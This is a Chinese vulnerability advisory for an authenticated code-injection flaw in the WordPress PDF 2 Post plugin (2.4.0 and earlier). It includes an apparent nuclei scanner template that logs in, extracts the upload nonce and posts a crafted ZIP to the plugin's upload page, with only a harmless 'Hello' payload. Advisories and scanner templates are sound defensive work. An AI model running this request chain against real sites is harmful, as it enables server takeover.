漏洞信息 漏洞名称: WordPress PDF 2 Post Remote Code Execution Vulnerability
漏洞编号:
漏洞类型: 代码注入
漏洞等级: 高危
漏洞描述: WordPress PDF 2 Post插件是一个允许用户将PDF文件转换为WordPress文章的工具,广泛应用于需要内容迁移或批量发布的场景中。该插件在2.4.0及之前版本中存在一个代码注入漏洞,允许经过身份验证的攻击者执行远程代码。漏洞的根源在于插件对用户上传的文件处理不当,未能正确验证和过滤输入,导致攻击者可以通过构造恶意的ZIP文件注入任意代码。这一漏洞的高危性在于,攻击者可以利用此漏洞在服务器上执行任意命令,可能导致网站被完全控制、数据泄露或其他恶意操作。由于攻击需要身份验证,因此只有拥有有效用户凭证的攻击者才能利用此漏洞。然而,考虑到WordPress的广泛使用和PDF 2 Post插件的功能,这一漏洞对使用该插件的网站构成了严重威胁。
产品厂商: termel
产品名称: PDF 2 Post
影响版本: version <= 2.4.0
来源: https://github.com/projectdiscovery/nuclei-templates/blob/6e7a222b22023979c9f3dd9d77115cb4d11e75d6/http%2Fcves%2F2025%2F2025-32583.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 id : 2025-32583 info : name : WordPress PDF 2 Post RCE Exploit <= 2.4.0 - Authenticated Remote Code Execution author : pussycat0x severity : high description : | Improper Control of Generation of Code ('Code Injection') vulnerability in termel PDF 2 Post allows Remote Code Inclusion. This issue affects PDF 2 Post : from n/a through 2.4.0. reference : - https://github.com/Nxploited/CVE-2025-32583 tags : cve,cve2025,wordpress,wp-plugin,rce,plugin,pdf2rce variables : filename : {{base64(gzip("Hello"))}} http : - raw: - | POST /wp-login.php HTTP/1.1 Host : {{Hostname}} Content-Type : application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-admin/edit.php?page=new-post-from-pdf HTTP/1.1 Host : {{Hostname}} - | POST /wp-admin/edit.php?page=new-post-from-pdf HTTP/1.1 Host : {{Hostname}} User-Agent : Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Accept-Encoding : gzip, deflate, br Accept : */* Connection : keep-alive Content-Length : 711 Content-Type : multipart/form-data; boundary=57fbacb93533400815c1e2ec994fe293 --57fbacb93533400815c1e2ec994fe293 Content-Disposition : form-data; name="pdf2post_upload_nonce" {{pdf2post_upload_nonce}} --57fbacb93533400815c1e2ec994fe293 Content-Disposition : form-data; name="_wp_http_referer" /wp-admin/edit.php?page=new-post-from-pdf --57fbacb93533400815c1e2ec994fe293 Content-Disposition : form-data; name="pdf_file_to_upload"; filename="{{randstr}}.zip" Content-Type : application/zip {{filename}} --57fbacb93533400815c1e2ec994fe293-- extractors : - type: regex internal : true group : 1 name : pdf2post_upload_nonce part : body_2 regex : - 'name="pdf2post_upload_nonce" value="([a-f0-9]+)"'